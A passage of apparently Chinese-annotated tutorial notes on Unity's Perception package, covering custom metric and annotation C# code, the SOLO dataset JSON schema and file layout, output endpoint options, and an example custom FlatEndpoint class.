    // 成员变量 description:表示注释定义的描述信息,是一个只读字符串属性,该属性描述了注释定义的用途和含义
    public override string description => "The position of the target in the camera's local space";
    }

    // 定义了一个序列化的 TargetPosition 类,其中包括物体的注释信息以及其在相机空间中的位置
    [Serializable]
    class TargetPosition : Annotation
    {
    // 构造函数:
    // 接受注释定义(AnnotationDefinition)实例
    // 感知传感器 ID(sensorId)
    // 物体在相机空间中的位置信息(pos)
    // 调用基类的构造函数进行初始化
    public TargetPosition(AnnotationDefinition definition, string sensorId, Vector3 pos)
    : base(definition, sensorId)
    {
    position = pos;
    }

    // 成员变量 position:表示物体在相机空间中的位置,类型为 Vector3
    public Vector3 position;

    // 方法 ToMessage():将该注释实例转换为消息格式,方便传输和分析。
    public override void ToMessage(IMessageBuilder builder)
    {
    base.ToMessage(builder);
    // 使用 IMessageBuilder 接口的 AddFloatArray() 方法将 position 转换为浮点数数组,并添加到消息体中去
    builder.AddFloatArray("position", MessageBuilderUtils.ToFloatVector(position));
    }

    // 检查该注释实例是否合法,始终返回 true
    public override bool IsValid() => true;

    }

    // 在 Setup() 方法中,注册度量标准 lightMetricDefinition 和注释定义 targetPositionDef
    protected override void Setup()
    {
    // 创建了一个名为 lightMetricDefinition 的 MetricDefinition 类实例,该实例表示灯光在世界空间中的位置度量。
    // 使用 MetricDefinition 构造函数传入三个字符串类型的参数:ID、名称和描述,
    // 分别指定度量定义的唯一标识符、度量定义的名称和作用。
    lightMetricDefinition =
    new MetricDefinition(
    "LightMetric",
    "lightMetric1",
    "The world-space position of the light");
    // 通过 DatasetCapture 类的 RegisterMetric() 方法注册了上述定义的度量定义,将其添加到场景捕捉器中。
    DatasetCapture.RegisterMetric(lightMetricDefinition);

    // 创建了一个名为 targetPositionDef 的 TargetPositionDef 类实例,
    // 该实例表示场景中某个目标物体相对于相机的位置注释。
    // 使用 TargetPositionDef 构造函数传入一个字符串 ID 参数,用于初始化注释定义实例。
    targetPositionDef = new TargetPositionDef("target1");
    // 通过 DatasetCapture 类的 RegisterAnnotationDefinition() 方法注册了上述定义的注释定义,
    // 将其添加到场景捕捉器中。
    DatasetCapture.RegisterAnnotationDefinition(targetPositionDef);
    }

    // 在 OnBeginRendering() 方法中,获取灯光位置并报告度量;计算物体在相机空间中的位置并报告注释
    // 这段代码出现在某个类的 OnBeginRendering() 方法中,在场景渲染之前被调用。
    protected override void OnBeginRendering(ScriptableRenderContext scriptableRenderContext)
    {
    // 获取灯光的世界空间位置,并使用 GenericMetric 类创建一个度量对象,
    // 并将其位置信息添加到 JSON 数组字符串中,将度量对象报告给 DatasetCapture,以记录灯光的位置信息。
    // Report the light's position by manually creating the json array string.
    var lightPos = targetLight.transform.position;
    var metric = new GenericMetric(new[] { lightPos.x, lightPos.y, lightPos.z }, lightMetricDefinition);
    DatasetCapture.ReportMetric(lightMetricDefinition, metric);

    // 计算目标物体相对于相机的本地位置,并使用 TargetPosition 类创建一个注释对象,
    // 其中包括注释的类型(即 targetPositionDef)、传感器 ID 和目标物体的本地位置信息。
    // compute the location of the object in the camera's local space
    Vector3 targetPos = perceptionCamera.transform.worldToLocalMatrix * target.transform.position;

    // 使用 PerceptionCamera 的 SensorHandle 类报告上述注释对象,并将其添加到 DatasetCapture 中。
    // Report using the PerceptionCamera's SensorHandle if scheduled this frame
    var sensorHandle = perceptionCamera.SensorHandle;

    if (sensorHandle.ShouldCaptureThisFrame)
    {
    var annotation = new TargetPosition(targetPositionDef, sensorHandle.Id, targetPos);
    sensorHandle.ReportAnnotation(targetPositionDef, annotation);
    }
    }
    }

    Example metric that is added each frame in the dataset:

    {
    "capture_id": null,
    "annotation_id": null,
    "sequence_id": "9768671e-acea-4c9e-a670-0f2dba5afe12",
    "step": 1,
    "metric_definition": "lightMetric1",
    "values": [
    96.1856,
    192.675964,
    -193.838638
    ]
    },

    **Example annotation that is added to each capture in the dataset: **

    {
    "annotation_id": "target1",
    "model_type": "targetPosDef",
    "description": "The position of the target in the camera's local space",
    "sensor_id": "camera",
    "id": "target1",
    "position": [
    1.85350215,
    -0.253945172,
    -5.015307
    ]
    }

    Output Endpoint

    Dataset Capture 跟踪 sensors(传感器)annotations(注释)metrics(度量),将数据传递到 EndpointEndpoint 负责将数据打包为用户可用的格式。

    Supported Endpoints

    Perception 软件包包含三个内置端点选项:

    1. (推荐)SOLO Endpoint

    随着模拟的进行,我们最新的输出格式将捕获信息写入相关目录。这与我们以前在模拟结束时写入数据的方法不同,使您能够在长时间模拟运行时查看数据。查看 SOLO endpoint 相对于我们以前的 Perception endpoint 所具有的优势的完整列表。


    SOLO 数据集是 JSON 和图像文件的组合。本文档描述了用于存储数据的架构。

    SOLO schema(模式)为模拟输出提供了一种通用结构,可以很容易地使用它来显示统计数据或训练机器学习模型。

    SOLO 数据集由 sensor captures(传感器捕获)、annotations(注释)和 metrics(度量组成),例如 images(图像)和 2d bounding box labels(二维边界框标签)。

    这些数据有各种形式,可能会被不同的 sensors(传感器)和 annotation(注释机制)捕获。

    多个 sensors(传感器)可以产生不同频率的捕获。

    目标

    schema(模式)应该:

    • 以一种定义良好的格式包括捕获的传感器数据和注释。这使我们能够维护 Perception 包和数据集消费者之间的合同(例如,统计和 ML 建模…)

    • 维护捕获的数据和同一传感器同时获取的注释之间的关系。

      它还应保持与时间相关的感知任务(如物体跟踪)的连续捕获之间的关系。

    • 支持流式数据,因为数据将在模拟过程中从多个进程或云实例动态创建。

    • 能够轻松支持新型传感器和注释。

    术语
    • simulation:一个 Unity player 构建的一个或多个 build,可能具有不同的参数。
    • capture:Unity 传感器的完整渲染过程,将渲染结果保存到数据文件中,如(png、pcd 等)
    • frame:Unity 模拟中的实际帧
    • sequence:simulation 生成的按时间顺序的一系列 captures。(Perception Scenario 中每一个 Iteration 对应一个 SOLO 数据 sequence)
    • step:每个 sequence 产生 frames 的数据索引。
    • annotation:记录的数据(如边界框或语义分割),用于描述同一时间戳的特定 capture。capture 可能包括多种类型的 annotations。
    • label:表示语义类型或类的字符串标记(如 car、human.adult 等)。一个 GameObject 可能有多个 labels 用于不同的 annotation 目的。
    • coordinate systems:schema 中使用了 3 个坐标系:
      • global coordinate system:相对于 Unity 中 global origin 的坐标。
      • sensor coordinate system:相对于 sensor(传感器)的坐标。这对于单个传感器的 ML 模型训练很有用,该传感器可以从全局坐标系和自我坐标系转换。在仿真中很少记录使用传感器坐标系的物体姿态的原始值。
    结构

    png

    SOLO 数据存储在 sequence/step 层次结构中。生成的数据的顶层将包括元数据定义文件,以及每个 captured sequence 的目录。

    在 sequence 目录中,将有一个 JSON 文件,其中包含 frame 中的所有 annotations 和 metrics。

    sensors 和 annotators(如 RGB 捕获或分段掩码)也将驻留在该目录中。出于组织目的,所有文件都将遵循严格的命名模式,frame 文件如下:

    • step.NNNN.frame.json
      • NNNN 是 step 的序号
    • step.NNNN.ID.EXT
      • NNNN 是 step 的序号
      • ID 是创建文件的 sensor 或 labeler 的注册 ID
      • EXT 是文件扩展名

    顶级目录包含:

    • metadata.json:元数据文件包含模拟范围的数据。这些值要么由 Perception 软件包自动生成一次,要么是系统范围的元数据。
    {
    "unityVersion": "2021.3.11f1",
    "perceptionVersion": "1.0.0-preview.1",
    "renderPipeline": "HDRP",
    "simulationStartTime": "2023/6/21 8:17:17",
    "scenarioRandomSeed": 539662031,
    "scenarioActiveRandomizers": [
    "BackgroundObjectPlacementRandomizer",
    "TextureRandomizer",
    "HueOffsetRandomizer",
    "ForegroundObjectPlacementRandomizer",
    "RotationRandomizer"
    ],
    "totalFrames": 100,
    "totalSequences": 100,
    "sensors": [
    "camera"
    ],
    "metricCollectors": [
    "ObjectCount",
    "RenderedObjectInfo",
    "scenario_iteration",
    "random-seed"
    ],
    "simulationEndTime": "2023/6/21 8:17:21",
    "annotators": [
    {
    "name": "bounding box",
    "type": "type.unity.com/unity.solo.BoundingBox2DAnnotation"
    },
    {
    "name": "semantic segmentation",
    "type": "type.unity.com/unity.solo.SemanticSegmentationAnnotation"
    }
    ]
    }
    • sensor_definitions.json:包含数据集中所有 sensors 的定义。
    {
    "sensorDefinitions": [
    {
    "@type": "type.unity.com/unity.solo.RGBCamera",
    "id": "camera",
    "modality": "camera",
    "description": "",
    "firstCaptureFrame": 0.0,
    "captureTriggerMode": "Scheduled",
    "simulationDeltaTime": 0.0166,
    "framesBetweenCaptures": 0,
    "manualSensorsAffectTiming": false
    }
    ]
    }
    • annotation_definitions.json:包含数据集中所有注释的定义。
    {
    "annotationDefinitions": [
    {
    "@type": "type.unity.com/unity.solo.BoundingBox2DAnnotation",
    "id": "bounding box",
    "description": "Produces 2D bounding box annotations for all visible objects that bear a label defined in this labeler's associated label configuration.",
    "spec": [
    {
    "label_id": 1,
    "label_name": "candy_minipralines_lindt"
    },

    ...

    {
    "label_id": 10,
    "label_name": "snack_granolabar_naturevalley"
    }
    ]
    },
    {
    "@type": "type.unity.com/unity.solo.SemanticSegmentationAnnotation",
    "id": "semantic segmentation",
    "description": "Generates a semantic segmentation image for each captured frame. Each object is rendered to the semantic segmentation image using the color associated with it based on this labeler's associated semantic segmentation label configuration. Semantic segmentation images are saved to the dataset in PNG format. Please note that only one SemanticSegmentationLabeler can render at once across all cameras."
    }
    ]
    }
    • metric_definitions.json:包含数据集中所有 metrics 的定义。
    {
    "metricDefinitions": [
    {
    "@type": "type.unity.com/unity.solo.ObjectCountMetric",
    "id": "ObjectCount",
    // 为该标签器相关的标签配置中定义的每个标签生成对象计数。
    "description": "Produces object counts for each label defined in this labeler's associated label configuration."
    },
    {
    "@type": "type.unity.com/unity.solo.RenderedObjectInfoMetric",
    "id": "RenderedObjectInfo",
    // 根据该标签器相关的标签配置,为每个在摄像头画面中占用一个或多个像素的对象,在每帧中生成标签 ID、实例 ID 和可见像素计数的单个度量。
    "description": "Produces label id, instance id, and visible pixel count in a single metric each frame for each object which takes up one or more pixels in the camera's frame, based on this labeler's associated label configuration."
    },
    {
    "@type": "type.unity.com/unity.solo.GenericMetric",
    "id": "scenario_iteration",
    // 数据集序列的迭代信息。
    "description": "Iteration information for dataset sequences"
    },
    {
    "@type": "type.unity.com/unity.solo.GenericMetric",
    "id": "random-seed",
    // 随机种子用于初始化仿真的随机状态。每次仿真只会触发一次。
    "description": "The random seed used to initialize the random state of the simulation. Only triggered once per simulation."
    }
    ]
    }

    每个 sequence 都将获得自己的目录,该目录将包含所有 capture。序列目录的命名约定如下:sequence.X,其中 X 是从值 0 开始的数值。例如,模拟的前三个 sequence 目录名称为:

    • sequence.0
    • sequency.1
    • sequence.2

    sequence 目录包含序列的所有 captures、annotations 和 metrics。

    所有数据文件名都以捕获它们的步骤开始。根据文件类型的不同,文件名规则不同:

    File Structure
    dataset.XXXX
    ├── metadata.json
    ├── sensor_definitions.json
    ├── annotation_definitions.json
    ├── metric_definitions.json
    └── sequence.NUM
    ├── step.NUM.frame.json
    ├── step.NUM.capture.SENSOR[_ID].[ext]
    └── step.NUM.annotation.NAME[_ID].SENSOR[_ID].[ext]
    Example Dataset Layout
    dataset
    ├── metadata.json
    ├── sensor_definitions.json
    ├── annotation_definitions.json
    ├── metric_definitions.json
    ├── sequence.1
    │ ├── step.1.frame.json
    │ ├── step.1.rgb.front_camera.png
    │ ├── step.1.semantic_segmentation_0.png
    │ ├── step.1.semantic_segmentation_1.png
    │ ├── step.1.instance_segmentation.png
    │ ├── step.2.frame.json
    │ ├── step.2.rgb.front_camera.png
    │ ├── step.2.semantic_segmentation_0.png
    │ ├── step.2.semantic_segmentation_1.png
    │ └── step.2.instance_segmentation.png
    └── sequence.2
    ├── step.1.frame.json
    ├── step.1.rgb.front_camera.png
    ├── step.1.semantic_segmentation_0.png
    ├── step.1.semantic_segmentation_1.png
    ├── step.1.instance_segmentation.png
    ├── step.2.frame.json
    ├── step.2.rgb.front_camera.png
    ├── step.2.semantic_segmentation_0.png
    ├── step.2.semantic_segmentation_1.png
    └── step.2.instance_segmentation.png
    Frame

    对于 step.1.frame.json,文件结构及解释:

    png

    frame {
    frame: <int> -- The integer ID of the frame
    sequence: <int> -- The sequence number
    step: <int> -- The step inside the sequence
    timestamp: <int> -- Timestamp in milliseconds since the sequence started 自序列开始以来的时间戳(以毫秒为单位)
    captures: [<capture>,...] [optional] - The list of captures (see below) captures 的参数信息
    metrics: [<metric>,...] [optional] - The list of metrics recorded for the frame (see below) metric 的参数信息
    }
    Capture

    png

    Capture 记录包含 captured(捕获)的文件、annotations(注释)集合和描述 sensor 状态的额外 metadata(元数据)之间的关系。

    capture {
    @type: <str> -- The class type of the sensor
    id: <str> -- The ID of the sensor that made the capture
    description: <str> -- Human readable description of the sensor
    position: <float3> -- Position in meters: (x, y, z) with respect to the global coordinate system
    rotation: <float4> -- Orientation as quaternion: w, x, y, z
    velocity: <float3> -- Velocity in meters per second as v_x, v_y, v_z
    acceleration: <float3> [optional] -- Acceleration in meters per second^2 as a_x, a_y, a_z
    annotations: [<obj>,...] [optional] -- List of the annotations in this capture. See below.
    }
    RGB Capture

    png

    rgb_capture : capture {
    filename: <str> -- A single file that stores sensor captured data.
    imageFormat: <str> -- The format of the sensor captured file. (e.g. "Png")
    dimension: <int2> -- The image size in pixels (width/height)
    projection: <string> -- holds the type of projection the camera used for that capture: Options: "perspective" or "orthographic"
    matrix: <float3> -- The projection matrix of the camera
    }

    reference: [camera_intrinsic](https://www.mathworks.com/help/vision/ug/camera-calibration.html#bu0ni74)
    Sequence, Step, and Timestamp

    在某些用例中,在模拟过程中,两个连续的捕获可能在时间上不相关。例如,如果我们在场景中为 X 步模拟生成随机放置的对象。在这种情况下,序列、步骤和时间戳与捕获的数据无关。我们可以为这些类型的捕获的序列、步骤和时间戳添加一个默认值。在我们需要保持捕获(例如,10 秒视频中的相机捕获序列)和[度量](#metrics)之间的时间顺序关系的情况下,我们需要添加序列、步骤和时间戳来保持捕获的时间顺序的关系。

    在 SOLO 中,序列表示任何时间顺序捕获和注释的集合,并对应于感知场景的一次迭代。时间戳是指自序列开始以来以毫秒为单位的模拟挂钟。步长是指在触发捕获或度量事件时增加的整数值。我们不能使用时间戳在两个不同的事件之间进行同步,因为时间戳是浮动的,因此会产生较差的索引。相反,我们使用了一个“步长”计数器,可以很容易地将同时发生的度量和捕获关联起来。

    以下是如何同步捕获、度量、时间戳和步骤的说明。

    png

    由于每个传感器可能会触发不同频率的捕获,因此在同一时间戳,我们可能包含 0 到 N 个捕获,其中 N 是该场景中包括的传感器的总数。如果在同一时间戳捕获两个传感器,则它们应该共享相同的序列、步骤和时间戳值。

    Annotation

    png

    Annotation 注释记录包含 sensor 的 ground truth,可以是内联的,也可以是单独的文件。单个 capture 可以包含许多 annotations,每个 annotation 对应于模拟中的一个活动 Labeler。

    annotation {
    @type: <str> -- The class type of the annotation
    id: <str> -- The registered ID of the annotation
    sensorId: <str> -- The ID of the sensor that this annotation is attached to
    description: <str> -- The human readable description of the sensor
    }

    除上述内容外,注释还可以包括为该注释记录的单个对象的阵列,例如边界框的列表。我们看下面的几个例子。此数组通常命名为 valuesinstances

    Example Annotations
    Semantic Segmentation

    语义分割注释扩展了基本注释类,以包括 PNG 格式的颜色掩码的文件名,其中每个颜色映射到唯一的对象类。

    SemanticSegmentationAnnotation {
    @type: "type.unity.com/unity.solo.SemanticSegmentationAnnotation",
    id: <str> -- The registered ID of the annotation 注释的注册 ID
    sensorId: <str> -- The ID of the sensor that this annotation is attached to 此注释所附加的传感器的 ID
    description: <str> -- The human readable description of the sensor 传感器的人类可读描述
    imageFormat: <str> -- Format of the segmentation mask ("Png") 分段掩码的格式(“Png”)
    dimension: <int2> -- Width and height of the output image 输出图像的宽度和高度
    instances [ -- Array of recorded object classes and their unique R,G,B pixel values 记录的对象类及其唯一的 R、G、B 像素值的数组
    {
    labelName: <str> -- String identifier of the object class label 对象类标签的字符串标识符
    pixelValue: <int4> -- R,G,B,A values for this label's unique color [0-255] 此标签的唯一颜色的 G、B、A 值[0-255]
    }, ...
    ]
    }

    语义分段注释示例:

    {
    "@type": "type.unity.com/unity.solo.SemanticSegmentationAnnotation",
    "id": "9ca0e2e4-5a0f-4ee3-8cae-b34565275059",
    "sensorId": "camera",
    "description": "Produces a semantic segmentation RGB mask",
    "imageFormat": "Png",
    "dimension": [
    1600.0,
    1200.0
    ],
    "filename": "step1.camera.9ca0e2e4-5a0f-4ee3-8cae-b34565275059.png",
    "instances": [
    {
    "labelName": "Baseboard-1",
    "pixelValue": [
    177,
    255,
    101,
    255
    ]
    }, ...
    ]
    }

    下面显示了一个示例语义分割掩码。请注意同一类物品(例如餐椅)的颜色是如何相同的:

    png

    注意:未标记的对象在分割遮罩中渲染为黑色

    Instance Segmentation

    与语义分割类似,实例分割注释包括 PNG 格式的颜色掩码的文件名。这一次,每个独特的物体都有一种独特的颜色。该模式与语义分割略有不同,包括instanceId(整个模拟中唯一的对象 id)和 labelId(对象类的数字标识符)。例如:

    "instances": [
    {
    "instanceId": 19,
    "labelId": 273,
    "labelName": "Wall",
    "color": [
    255,
    53,
    0,
    255
    ]
    }, ...
    ]

    示例实例分段掩码如下所示。请注意每个对象如何具有唯一的颜色:

    png

    2D Bounding Box

    每个边界框记录将一个元组(实例、标签)映射到一组 4 个变量(x、y、宽度、高度),用于绘制边界框。

    3D Bounding Box

    三维边界框信息。与 2D 边界框不同,3D 边界框坐标是在传感器坐标系中捕获的。每个边界框记录将一个元组(实例、标签)映射到绘制三维边界框的平移、大小和旋转,以及三维边界盒的速度和加速度(可选)。

    Keypoints

    关键点数据,通常用于人体姿态估计。

    Metrics

    度量存储可用于描述特定序列、捕获或注释的额外元数据。度量记录存储为任意数量(M)的键值对。对于序列度量,capture_id、annotation_id 和 step 应为 null。对于捕获度量,annotation_id 可以为 null。对于注释度量,sequence_id、capture_id、annotation_id 和 step 这四列都不为空。度量文件可以从不同的模拟实例并行生成。

    Definitions

    传感器、注释和度量定义表在模拟过程中是静态的。这通常来自模拟的定义,并在模拟过程中生成。

    sensor_definitions.json

    JSON 文件,包含模拟中存在的所有传感器的集合。每个传感器都被分配了一个唯一的 UUID。每个都与一个自我相关联,并将自我的 UUID 存储为外键。

    传感器扩展了这个基本传感器类,并且可以在其定义中包含其他字段。

    annotation_definitions.json

    一个 JSON 文件,包含一组注释规范(annotation_definition)。每个记录描述一种特定类型的注释。

    metric_definitions.json

    存储度量规范记录集合(metric_definition)的 JSON 文件。每个规范记录描述存储在 metric 值中的特定度量。

    Schema Versioning

    架构版本控制。

    2. Perception Endpoint

    我们的传统 Perception 输出格式,其中信息存储在捕获中,并在模拟结束时写入(或 150 帧块)。尽管该端点仍然支持所有新的 Labeler,如深度和遮挡,但我们强烈建议尝试上面的 SOLO 端点,以获得更轻松的后处理和调试体验。

    3. No Output Endpoint

    选中时,此端点不会将任何信息写入磁盘!这对于防止在编辑器中调试模拟逻辑或使用 Perception Camera 的实时可视化工具进行测试时生成无关数据集非常有用。

    How to Change the Active Endpoint

    1. Project SettingsPerception
    2. 点击 Change Endpoint Type
    3. 从下拉列表中选择您的首选端点。

    Creating your Own Endpoint

    使用 Endpoint 系统,为您喜欢的输出格式创建自己的 Endpoint 不仅是可能的,而且很容易访问。我们整理了一个假设自定义 Endpoint 的小示例,向您介绍创建、迭代和使用自己的自定义端点的基本知识。

    0.11.0-preview.1 版本以后的 Perception 软件包支持自定义端点的概念。以前,Perception 生成的所有数据都是使用我们专有的输出格式自动写入磁盘的。但是,使用自定义 Endpoint,您可以使用我们的中间表示以您选择的输出格式编写所有数据!

    我们用一个我们称之为“FlatEndpoint”的假设端点来证明这一点,该端点将在每次模拟运行中将所有数据写入一个唯一的文件夹中。为此,我们创建了一个新类并实现了“IConsumerEndpoint”。这允许在 Perception Settings UI 中选择我们的自定义端点,并将其用作模拟的端点。我们进一步实现了“IFileSystemEndpoint”界面,以连接 Perception 如何保存上次创建的数据集所在的位置,并使“显示最新数据集”按钮等功能正常工作。

    using System;
    using System.Collections.Generic;
    using System.IO;
    using Newtonsoft.Json.Linq;
    using UnityEngine;
    using UnityEngine.Perception.GroundTruth;
    using UnityEngine.Perception.GroundTruth.Consumers;
    using UnityEngine.Perception.GroundTruth.DataModel;
    using UnityEngine.Perception.Settings;

    namespace MyCustomNamespace
    {
    /// <summary>
    /// Example endpoint which outputs all information in small files to one single directory.
    /// 示例端点,将所有信息输出到一个单独的目录中的小文件中。
    /// We demonstrate two methods of serializing data: (1) Custom serialization; (2) IMessageProducers
    /// 我们展示了两种序列化数据的方法:(1)自定义序列化;(2)IMessageProducers。
    /// </summary>
    /// <remarks>For more complex examples, checkout SoloEndpoint</remarks>
    /// 要了解更复杂的示例,请查看 SoloEndpoint。
    [Serializable]
    public class FlatEndpoint : IConsumerEndpoint, IFileSystemEndpoint
    {
    public string prefix = "FLAT";

    DateTimeOffset m_SimulationStartTime;

    /// Helper function to create a new JsonMessageBuilder
    /// 创建新的 JsonMessageBuilder 的辅助函数。
    JsonMessageBuilder GetNewJsonMessageBuilder() => new JsonMessageBuilder();

    #region IFileSystemEndpoint

    /// <summary>
    /// Allows the user to set the base path from the Perception Settings UI.
    /// 允许用户从 Perception Settings 用户界面设置基本路径。
    /// </summary>
    public string basePath
    {
    get => PerceptionSettings.GetOutputBasePath();
    set => PerceptionSettings.SetOutputBasePath(value);
    }

    string m_CachedCurrentPath = string.Empty;
    /// <summary>
    /// The root directory to use for all files that we output.
    /// 我们输出的所有文件使用的根目录。
    /// </summary>
    public string currentPath
    {
    get
    {
    // Check if we already reserved the output path for this simulation run
    // 检查我们是否已为此仿真运行保留了输出路径。
    if (!string.IsNullOrWhiteSpace(m_CachedCurrentPath))
    return m_CachedCurrentPath;

    // A small piece of logic to get the next available directory name
    // 获取下一个可用目录名称的小段逻辑。
    // get: {basePath}/FLAT_0
    // if above already exists, then get: {basePath}/FLAT_1
    // ... and so on

    var availableSuffix = 0;
    m_CachedCurrentPath = string.Empty;
    do
    {
    m_CachedCurrentPath = Path.Combine(basePath, $"{prefix}_{availableSuffix}");
    availableSuffix++;
    }
    while (Directory.Exists(m_CachedCurrentPath));

    // actually create the directory we decided upon above
    // 实际创建我们上面决定的目录。
    Directory.CreateDirectory(m_CachedCurrentPath);

    return m_CachedCurrentPath;
    }
    }

    /// <summary>
    /// The path used when "Reset to Default" is used in the Perception Settings UI.
    /// 在 Perception Settings 用户界面上使用“重置为默认值”时使用的路径。
    /// </summary>
    public string defaultPath => Path.Combine(Application.persistentDataPath);
    #endregion

    #region IConsumerEndpoint

    public string description => "Example endpoint that puts all the files in one single directory";

    /// <summary>
    /// Validate the configuration of your endpoint before the simulation runs.
    /// 在仿真运行之前验证端点的配置。
    /// </summary>
    public bool IsValid(out string errorMessage)
    {
    // Check if the prefix supplied by the user is empty or whitespace
    // 检查用户提供的前缀是否为空或空格。
    if (string.IsNullOrWhiteSpace(prefix))
    {
    errorMessage = "Prefix must not be empty.";
    return false;
    }

    errorMessage = $"Directory {basePath} does not exist. Please create the directory.";
    // To create {basePath}/FLAT_{xyz}, we need to ensure that the {basePath} directory exists.
    // 要创建 {basePath}/FLAT_{xyz},我们需要确保目录 {basePath} 已经存在。
    // If it doesn't, the Perception Settings UI will show the above error message.
    // 如果不存在,则 Perception Settings 用户界面将显示上述错误消息。
    return Directory.Exists(basePath);
    }

    public void SimulationStarted(SimulationMetadata metadata)
    {
    // record when the simulation started so we can use this to calculate
    // duration of the simulation on the SimulationEnded function
    // 记录仿真开始时间,以便我们可以在 SimulationEnded 函数中使用它来计算仿真持续时间。
    m_SimulationStartTime = DateTimeOffset.Now;
    }

    public void SensorRegistered(SensorDefinition sensor)
    {
    //// Using Method 1 (Custom Serialization)
    //// 使用方法 1(自定义序列化)
    // 1. Create a new JsonMessageBuilder class
    // 创建一个新的 JsonMessageBuilder 类
    var builder = GetNewJsonMessageBuilder();

    // 2. Add all relevant fields to the builder as unique key-value pairs
    // 将所有相关字段作为唯一的键值对添加到构建器中。
    builder.AddString("model_type", sensor.modelType);
    builder.AddString("capture_mode", sensor.captureTriggerMode.ToString());
    builder.AddString("id", sensor.id);
    builder.AddInt("frames_between_captures", sensor.framesBetweenCaptures);
    builder.AddFloat("first_capture_frame", sensor.firstCaptureFrame);

    // Invariant: The builder now contains a representation of the sensor class
    // 不变量:该构建器现在包含传感器类的表示。
    // 3. We can use the ToJson function in the builder to write that representation to JSON
    // 我们可以使用构建器中的 ToJson 函数将该表示写入 JSON。
    PathUtils.WriteAndReportJsonFile(
    Path.Combine(currentPath, $"sensor-{sensor.id}.json"),
    builder.ToJson()
    );
    }

    public void AnnotationRegistered(AnnotationDefinition annotationDefinition)
    {
    //// Using Method 2 (IMessageProducer Serialization)
    //// 使用方法 2(IMessageProducer 序列化)

    // 1. Create a new JsonMessageBuilder class
    // 创建一个新的 JsonMessageBuilder 类
    var builder = GetNewJsonMessageBuilder();

    // 2. Allow the annotation definition to convert itself to a message and add it to our builder
    // 允许注解定义将自身转换为消息并将其添加到我们的构建器中
    annotationDefinition.ToMessage(builder);

    // Invariant: The builder now contains a representation of the annotation definition class
    // 不变量:该构建器现在包含注解定义类的表示
    // 3. We can use the ToJson function in the builder to write that representation to JSON
    // 我们可以使用构建器中的 ToJson 函数将该表示写入 JSON
    PathUtils.WriteAndReportJsonFile(
    Path.Combine(currentPath, $"annotation-definition-{annotationDefinition.id}.json"),
    builder.ToJson()
    );
    }

    public void MetricRegistered(MetricDefinition metricDefinition)
    {
    // Using Method 2 (IMessageProducer Serialization)
    // 使用方法 2(IMessageProducer 序列化)

    // Similar to SensorDefinition, MetricDefinition also inherits from IMessageProducer so it can tell the builder how it should be serialized.
    // 类似于 SensorDefinition,MetricDefinition 也继承自 IMessageProducer,因此它可以告诉构建器它应该如何序列化。
    var builder = GetNewJsonMessageBuilder();
    metricDefinition.ToMessage(builder);
    PathUtils.WriteAndReportJsonFile(
    Path.Combine(currentPath, $"annotation-definition-{metricDefinition.id}.json"),
    builder.ToJson()
    );
    }

    public void FrameGenerated(Frame frame)
    {
    // Using Method 2 (IMessageProducer Serialization)

    // By default, the JsonMessageBuilder class does not know how to process image files referenced in the
    // Frame class. So we need to make a new FlatFrameMessageBuilder that inherits from JsonMessageBuilder
    // and specify how to handle image files. We can conveniently use the ToMessage function of the Frame
    // class and pass in our new FlatFrameMessageBuilder class.
    // 默认情况下,JsonMessageBuilder 类不知道如何处理 Frame 类中引用的图像文件。
    // 因此,我们需要创建一个新的 FlatFrameMessageBuilder 类,它继承自 JsonMessageBuilder 并指定如何处理图像文件。
    // 我们可以方便地使用 Frame 类的 ToMessage 函数并传入我们的新的 FlatFrameMessageBuilder 类。
    var builder = new FlatFrameMessageBuilder(this, frame);
    frame.ToMessage(builder);

    PathUtils.WriteAndReportJsonFile(
    Path.Combine(currentPath, $"frame-{frame.id}.json"),
    builder.ToJson()
    );
    }

    public void SimulationCompleted(SimulationMetadata metadata)
    {
    // Using Method 2 (IMessageProducer Serialization)
    // 使用方法 2(IMessageProducer 序列化)

    // 1. Create a new JsonMessageBuilder class
    // 创建一个新的 JsonMessageBuilder 类
    var metadataBuilder = GetNewJsonMessageBuilder();

    // 2. Add metadata as a message into the metadataBuilder
    // 将元数据作为消息添加到 metadataBuilder 中
    metadata.ToMessage(metadataBuilder);

    // 3. Write the metadata parameter to {currentPath}/metadata.json
    // 将元数据参数写入 {currentPath}/metadata.json
    PathUtils.WriteAndReportJsonFile(
    Path.Combine(currentPath, "metadata.json"),
    metadataBuilder.ToJson()
    );

    //// Using Method 1 (Custom Serialization)

    // 1. Create a new JsonMessageBuilder class
    var completeBuilder = GetNewJsonMessageBuilder();
    var simulationEndTime = DateTimeOffset.Now;
    var simulationDuration = simulationEndTime - m_SimulationStartTime;

    // 2. Add all relevant key-value pairs
    completeBuilder.AddLong("start_timestamp", m_SimulationStartTime.ToUnixTimeMilliseconds());
    completeBuilder.AddLong("end_timestamp", m_SimulationStartTime.ToUnixTimeMilliseconds());
    completeBuilder.AddDouble("duration_seconds", simulationDuration.TotalSeconds);

    // 3. Convert data to json and write to file
    PathUtils.WriteAndReportJsonFile(
    Path.Combine(currentPath, "simulation-complete.json"),
    completeBuilder.ToJson()
    );
    }

    /// <summary>
    /// Placeholder for crash resumption logic.
    /// 崩溃续传逻辑占位符
    /// </summary>
    /// <remarks>Unsupported for FlatEndpoint</remarks>
    /// FlatEndpoint 不支持该操作。
    public (string, int) ResumeSimulationFromCrash(int maxFrameCount)
    {
    Debug.LogError("Crash resumption not supported for FlatEndpoint output.");
    return (string.Empty, 0);
    }

    public object Clone()
    {
    return new FlatEndpoint();
    }

    #endregion
    }

    /// <summary>
    /// A MessageBuilder that extends JsonMessageBuilder to add support for serializing images and tensors.
    /// 创建一个新的 MessageBuilder 类,它继承自 JsonMessageBuilder 并添加支持序列化图像和张量的功能。
    /// </summary>
    class FlatFrameMessageBuilder : JsonMessageBuilder
    {
    Frame m_Frame;
    FlatEndpoint m_Endpoint;

    public FlatFrameMessageBuilder(FlatEndpoint endpoint, Frame frame)
    {
    m_Endpoint = endpoint;
    m_Frame = frame;
    }

    /// <summary>
    /// Write out the byte array as an image and append sequence and step number to the key to construct the final file-name.
    /// 将字节数组写出为图像,并将序列号和步骤号附加到键上构造最终的文件名。
    /// </summary>
    public override void AddEncodedImage(string key, string extension, byte[] value)
    {
    if (value.Length > 0)
    {
    var filename = $"{key}_{m_Frame.sequence}-{m_Frame.step}.{extension.ToLower()}";
    // write out the file
    PathUtils.WriteAndReportImageFile(
    Path.Combine(m_Endpoint.currentPath, filename),
    value
    );
    }
    }

    /// <summary>
    /// A nested message adds the output of an IMessageBuilder to a specific key.
    /// 嵌套消息将 IMessageBuilder 的输出添加到特定的键中。
    /// </summary>
    public override IMessageBuilder AddNestedMessage(string key)
    {
